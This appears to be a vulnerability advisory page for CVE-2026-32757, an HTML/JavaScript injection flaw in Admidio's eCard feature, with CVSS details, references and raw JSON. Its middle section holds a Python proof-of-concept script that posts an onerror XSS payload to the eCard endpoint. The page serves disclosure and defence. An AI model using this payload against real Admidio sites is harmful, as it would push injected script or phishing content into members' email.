Security Vulnerability Report
CVE-2026-32757 CVSS 5.4 MEDIUM

Published: 2026-03-20 00:16:17
Last Modified: 2026-03-23 16:52:30

Description

Admidio is an open-source user management solution. In versions 5.0.6 and below, the eCard send handler uses a raw $_POST['ecard_message'] value instead of the HTMLPurifier-sanitized $formValues['ecard_message'] when constructing the greeting card HTML. This allows an authenticated attacker to inject arbitrary HTML and JavaScript into greeting card emails sent to other members, bypassing the server-side HTMLPurifier sanitization that is properly applied to the ecard_message field during form validation. An attack can result in any member or role receiving phishing content that appears legitimate, crossing from the web application into recipients' email clients. This issue has been fixed in version 5.0.7.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:admidio:admidio:*:*:*:*:*:*:*:* - VULNERABLE
Admidio <= 5.0.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# PoC for CVE-2026-32757
import requests


def exploit(target_url, session_cookie):
    headers = {
        "Cookie": session_cookie
    }
    # Malicious payload to be injected into the email body
    payload_data = {
        "ecard_message": "<img src=x onerror=alert('CVE-2026-32757')>",
        "ecard_recipients": "2",  # ID of the victim user
        # Other required form fields omitted for brevity
    }
    # Sending the malicious eCard
    response = requests.post(
        f"{target_url}/adm_program/modules/ecards/ecards_function.php",
        data=payload_data,
        headers=headers,
    )
    if response.status_code == 200:
        print("[+] Payload sent successfully. Check the victim's email.")
    else:
        print("[-] Failed to send payload.")


# Usage
# exploit("http://target-site.com", "PHPSESSID=attacker_session_id")
```

References

https://github.com/Admidio/admidio/releases/tag/v5.0.7 (Release Notes)
https://github.com/Admidio/admidio/security/advisories/GHSA-4wr4-f2qf-x5wj (Exploit, Mitigation, Vendor Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-32757",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-20T00:16:16.930",
    "lastModified": "2026-03-23T16:52:29.850",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Admidio is an open-source user management solution. In versions 5.0.6 and below, the eCard send handler uses a raw $_POST['ecard_message'] value instead of the HTMLPurifier-sanitized $formValues['ecard_message'] when constructing the greeting card HTML. This allows an authenticated attacker to inject arbitrary HTML and JavaScript into greeting card emails sent to other members, bypassing the server-side HTMLPurifier sanitization that is properly applied to the ecard_message field during form validation. An attack can result in any member or role receiving phishing content that appears legitimate, crossing from the web application into recipients' email clients. This issue has been fixed in version 5.0.7."
      },
      {
        "lang": "es",
        "value": "Admidio es una solución de gestión de usuarios de código abierto. En las versiones 5.0.6 e inferiores, el gestor de envío de eCard utiliza un valor $_POST['ecard_message'] sin procesar en lugar del $formValues['ecard_message'] saneado por HTMLPurifier al construir el HTML de la tarjeta de felicitación. Esto permite a un atacante autenticado inyectar HTML y JavaScript arbitrarios en correos electrónicos de tarjetas de felicitación enviados a otros miembros, eludiendo el saneamiento de HTMLPurifier del lado del servidor que se aplica correctamente al campo ecard_message durante la validación del formulario. Un ataque puede resultar en que cualquier miembro o rol reciba contenido de phishing que parezca legítimo, pasando de la aplicación web a los clientes de correo electrónico de los destinatarios. Este problema ha sido solucionado en la versión 5.0.7."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.3,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [{"lang": "en", "value": "CWE-79"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:admidio:admidio:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "5.0.7",
                "matchCriteriaId": "3347E657-D132-4D87-A355-391136657A27"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/Admidio/admidio/releases/tag/v5.0.7",
        "source": "[email protected]",
        "tags": ["Release Notes"]
      },
      {
        "url": "https://github.com/Admidio/admidio/security/advisories/GHSA-4wr4-f2qf-x5wj",
        "source": "[email protected]",
        "tags": ["Exploit", "Mitigation", "Vendor Advisory"]
      }
    ]
  }
}
```